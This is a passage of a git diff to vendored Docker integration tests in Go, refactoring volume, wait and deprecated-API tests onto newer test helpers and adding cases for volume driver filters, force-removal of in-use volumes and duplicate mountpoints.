61a9413758..340bdfe254 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go @@ -1,6 +1,7 @@ package main import ( + "context" "fmt" "io/ioutil" "os" @@ -8,16 +9,21 @@ import ( "path/filepath" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { dockerCmd(c, "volume", "create") - _, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver")) - c.Assert(err, check.Not(check.IsNil)) + _, _, err := dockerCmdWithError("volume", "create", "-d", "nosuchdriver") + c.Assert(err, check.NotNil) // test using hidden --name option out, _ := dockerCmd(c, "volume", "create", "--name=test") @@ -31,7 +37,7 @@ func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { c.Assert( - exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(), + exec.Command(dockerBinary, "volume", "inspect", "doesnotexist").Run(), check.Not(check.IsNil), check.Commentf("volume inspect should error on non-existent volume"), ) @@ -49,21 +55,18 @@ func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) { dockerCmd(c, "volume", "create", "test1") dockerCmd(c, "volume", "create", "test2") - dockerCmd(c, "volume", "create", "not-shown") + dockerCmd(c, "volume", "create", "test3") - result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown") - c.Assert(result, icmd.Matches, icmd.Expected{ + result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesnotexist", "test3") + result.Assert(c, icmd.Expected{ ExitCode: 1, - Err: "No such volume: doesntexist", + Err: "No such volume: doesnotexist", }) out := result.Stdout() - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out)) - c.Assert(out, checker.Contains, "test1") c.Assert(out, checker.Contains, "test2") - c.Assert(out, checker.Not(checker.Contains), "not-shown") + c.Assert(out, checker.Contains, "test3") } func (s *DockerSuite) TestVolumeCLILs(c *check.C) { @@ -75,11 +78,8 @@ func (s *DockerSuite) TestVolumeCLILs(c *check.C) { dockerCmd(c, "volume", "create", "soo") dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/") - out, _ := dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - - assertVolList(c, out, []string{"aaa", "soo", "test"}) + out, _ := dockerCmd(c, "volume", "ls", "-q") + assertVolumesInList(c, out, []string{"aaa", "soo", "test"}) } func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { @@ -88,12 +88,7 @@ func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { dockerCmd(c, "volume", "create", "soo") out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"aaa", "soo", "test"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + assertVolumesInList(c, out, []string{"aaa", "soo", "test"}) } func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { @@ -112,12 +107,7 @@ func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "--config", d, "volume", "ls") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"aaa default", "soo default", "test default"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + assertVolumesInList(c, out, []string{"aaa default", "soo default", "test default"}) } // assertVolList checks volume retrieved with ls command @@ -136,6 +126,20 @@ func assertVolList(c *check.C, out string, expectVols []string) { c.Assert(volList, checker.DeepEquals, expectVols) } +func assertVolumesInList(c *check.C, out string, expected []string) { + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + for _, expect := range expected { + found := false + for _, v := range lines { + found = v == expect + if found { + break + } + } + c.Assert(found, checker.Equals, true, check.Commentf("Expected volume not found: %v, got: %v", expect, lines)) + } +} + func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { prefix, _ := getPrefixAndSlashFromDaemonPlatform() dockerCmd(c, "volume", "create", "testnotinuse1") @@ -182,21 +186,8 @@ func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin") c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) - c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") - outArr = strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc") - outArr = strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - } func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) { @@ -220,17 +211,13 @@ func (s *DockerSuite) TestVolumeCLIRm(c *check.C) { dockerCmd(c, "volume", "rm", id) dockerCmd(c, "volume", "rm", "test") - out, _ = dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) - volumeID := "testing" dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar") - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing")) - c.Assert( - err, - check.Not(check.IsNil), - check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out)) + + icmd.RunCommand(dockerBinary, "volume", "rm", "testing").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + }) out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar") c.Assert(strings.TrimSpace(out), check.Equals, "hello") @@ -244,12 +231,13 @@ func (s *DockerSuite) TestVolumeCLIRm(c *check.C) { dockerCmd(c, "volume", "rm", volumeID) c.Assert( - exec.Command("volume", "rm", "doesntexist").Run(), + exec.Command("volume", "rm", "doesnotexist").Run(), check.Not(check.IsNil), check.Commentf("volume rm should fail with non-existent volume"), ) } +// FIXME(vdemeester) should be a unit test in cli/command/volume package func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { out, _ := dockerCmd(c, "volume") // no args should produce the cmd usage output @@ -257,15 +245,20 @@ func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { c.Assert(out, checker.Contains, usage) // invalid arg should error and show the command usage on stderr - _, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg")) - c.Assert(err, check.NotNil, check.Commentf(stderr)) - c.Assert(stderr, checker.Contains, usage) + icmd.RunCommand(dockerBinary, "volume", "somearg").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: usage, + }) // invalid flag should error and show the flag error and cmd usage - _, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag")) - c.Assert(err, check.NotNil, check.Commentf(stderr)) - c.Assert(stderr, checker.Contains, usage) - c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag") + result := icmd.RunCommand(dockerBinary, "volume", "--no-such-flag") + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Error: "exit status 125", + Err: usage, + }) + c.Assert(result.Stderr(), checker.Contains, "unknown flag: --no-such-flag") } func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) { @@ -296,6 +289,7 @@ func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) { c.Assert(info[4], checker.Equals, "tmpfs") c.Assert(info[5], checker.Contains, "uid=1000") c.Assert(info[5], checker.Contains, "size=1024k") + break } } c.Assert(found, checker.Equals, true) @@ -370,16 +364,43 @@ func (s *DockerSuite) TestVolumeCLILsFilterLabels(c *check.C) { c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) } +func (s *DockerSuite) TestVolumeCLILsFilterDrivers(c *check.C) { + // using default volume driver local to create volumes + testVol1 := "testvol-1" + out, _, err := dockerCmdWithError("volume", "create", testVol1) + c.Assert(err, check.IsNil) + + testVol2 := "testvol-2" + out, _, err = dockerCmdWithError("volume", "create", testVol2) + c.Assert(err, check.IsNil) + + // filter with driver=local + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") + c.Assert(out, checker.Contains, "testvol-1\n", check.Commentf("expected volume 'testvol-1' in output")) + c.Assert(out, checker.Contains, "testvol-2\n", check.Commentf("expected volume 'testvol-2' in output")) + + // filter with driver=invaliddriver + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invaliddriver") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + // filter with driver=loca + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loca") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + // filter with driver= + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) +} + func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) { out, _ := dockerCmd(c, "volume", "create") id := strings.TrimSpace(out) dockerCmd(c, "volume", "rm", "-f", id) dockerCmd(c, "volume", "rm", "--force", "nonexist") - - out, _ = dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) } func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) { @@ -394,15 +415,54 @@ func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data` path := strings.TrimSuffix(strings.TrimSpace(out), "/_data") - out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path)) - c.Assert(err, check.IsNil) + icmd.RunCommand("rm", "-rf", path).Assert(c, icmd.Success) - dockerCmd(c, "volume", "rm", "-f", "test") + dockerCmd(c, "volume", "rm", "-f", name) out, _ = dockerCmd(c, "volume", "ls") c.Assert(out, checker.Not(checker.Contains), name) - dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", name) + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) +} + +// TestVolumeCLIRmForceInUse verifies that repeated `docker volume rm -f` calls does not remove a volume +// if it is in use. Test case for https://github.com/docker/docker/issues/31446 +func (s *DockerSuite) TestVolumeCLIRmForceInUse(c *check.C) { + name := "testvolume" + out, _ := dockerCmd(c, "volume", "create", name) + id := strings.TrimSpace(out) + c.Assert(id, checker.Equals, name) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + out, e := dockerCmd(c, "create", "-v", "testvolume:"+prefix+slash+"foo", "busybox") + cid := strings.TrimSpace(out) + + _, _, err := dockerCmdWithError("volume", "rm", "-f", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "volume is in use") out, _ = dockerCmd(c, "volume", "ls") c.Assert(out, checker.Contains, name) + + // The original issue did not _remove_ the volume from the list + // the first time. But a second call to `volume rm` removed it. + // Calling `volume rm` a second time to confirm it's not removed + // when calling twice. + _, _, err = dockerCmdWithError("volume", "rm", "-f", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "volume is in use") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) + + // Verify removing the volume after the container is removed works + _, e = dockerCmd(c, "rm", cid) + c.Assert(e, check.Equals, 0) + + _, e = dockerCmd(c, "volume", "rm", "-f", name) + c.Assert(e, check.Equals, 0) + + out, e = dockerCmd(c, "volume", "ls") + c.Assert(e, check.Equals, 0) + c.Assert(out, checker.Not(checker.Contains), name) } func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { @@ -425,3 +485,155 @@ func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2)) c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3)) } + +// Test case (1) for 21845: duplicate targets for --volumes-from +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFrom(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-d", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out)) + + // Only the second volume will be referenced, this is backward compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Equals, data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} + +// Test case (2) for 21845: duplicate targets for --volumes-from and -v (bind) +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndBind(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + // /tmp/data is automatically created, because we are not using the modern mount API here + out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-v", "/tmp/data:/tmp/data", "-d", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out)) + + // No volume will be referenced (mount is /tmp/data), this is backward compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} + +// Test case (3) for 21845: duplicate targets for --volumes-from and `Mounts` (API only) +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndMounts(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + err := os.MkdirAll("/tmp/data", 0755) + c.Assert(err, checker.IsNil) + // Mounts is available in API + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + config := container.Config{ + Cmd: []string{"top"}, + Image: "busybox", + } + + hostConfig := container.HostConfig{ + VolumesFrom: []string{"data1", "data2"}, + Mounts: []mount.Mount{ + { + Type: "bind", + Source: "/tmp/data", + Target: "/tmp/data", + }, + }, + } + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &network.NetworkingConfig{}, "app") + + c.Assert(err, checker.IsNil) + + // No volume will be referenced (mount is /tmp/data), this is backward compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go index 961aef5525..669e54f1ae 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go @@ -6,8 +6,9 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) // non-blocking wait with 0 exit code @@ -36,7 +37,7 @@ func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) { chWait := make(chan string) go func() { chWait <- "" - out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID)) + out := icmd.RunCommand(dockerBinary, "wait", containerID).Combined() chWait <- out }() diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go index 7bc287eca7..ffb06da40f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go @@ -7,7 +7,9 @@ import ( "net/http" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -21,17 +23,24 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) { config := map[string]interface{}{ "Binds": []string{"/aa:/bb"}, } - status, body, err := sockRequest("POST", "/containers/"+name+"/start", config) + res, body, err := request.Post("/containers/"+name+"/start", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - c.Assert(string(body), checker.Contains, "was deprecated since v1.10") + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + // assertions below won't work before 1.32 + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + c.Assert(string(buf), checker.Contains, "was deprecated since API v1.22") + } } func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { // TODO Windows CI: Investigate further why this fails on Windows to Windows CI. testRequires(c, DaemonIsLinux) path := "/foo" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { path = `c:\foo` } name := "testing" @@ -40,17 +49,17 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { "Volumes": map[string]struct{}{path: {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - bindPath := randomTmpDirPath("test", daemonPlatform) + bindPath := RandomTmpDirPath("test", testEnv.OSType) config = map[string]interface{}{ "Binds": []string{bindPath + ":" + path}, } - status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) pth, err := inspectMountSourceField(name, path) c.Assert(err, checker.IsNil) @@ -67,20 +76,28 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C) "Volumes": map[string]struct{}{"/tmp": {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - bindPath1 := randomTmpDirPath("test1", daemonPlatform) - bindPath2 := randomTmpDirPath("test2", daemonPlatform) + bindPath1 := RandomTmpDirPath("test1", testEnv.OSType) + bindPath2 := RandomTmpDirPath("test2", testEnv.OSType) config = map[string]interface{}{ "Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"}, } - status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, body, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) + c.Assert(err, checker.IsNil) + + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err)) + + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + c.Assert(string(buf), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(buf), err)) } func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { @@ -97,16 +114,16 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { "Volumes": map[string]struct{}{volPath: {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) config = map[string]interface{}{ "VolumesFrom": []string{volName}, } - status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) pth, err := inspectMountSourceField(name, volPath) c.Assert(err, checker.IsNil) @@ -127,9 +144,9 @@ func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) { dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox") bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}} - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec) + res, _, err := request.Post(formatV123StartAPIURL("/containers/two/start"), request.JSONBody(bindSpec)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) fooDir2, err := inspectMountSourceField("two", "/foo") c.Assert(err, checker.IsNil) @@ -148,11 +165,15 @@ func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) { "Memory": 524287 }` - res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + res, body, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - b, err2 := readBody(body) + b, err2 := request.ReadBody(body) c.Assert(err2, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") } @@ -167,7 +188,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig( hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -185,7 +206,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c * hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -197,13 +218,15 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLi testRequires(c, DaemonIsLinux) name := "test-host-config-links" out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top") + defer dockerCmd(c, "stop", "link0") id := strings.TrimSpace(out) dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top") + defer dockerCmd(c, "stop", name) hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -217,7 +240,7 @@ func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) { config := `{"HostConfig": {"Dns": null}}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go index 94ef9b1a00..c182b2a7aa 100644 --- 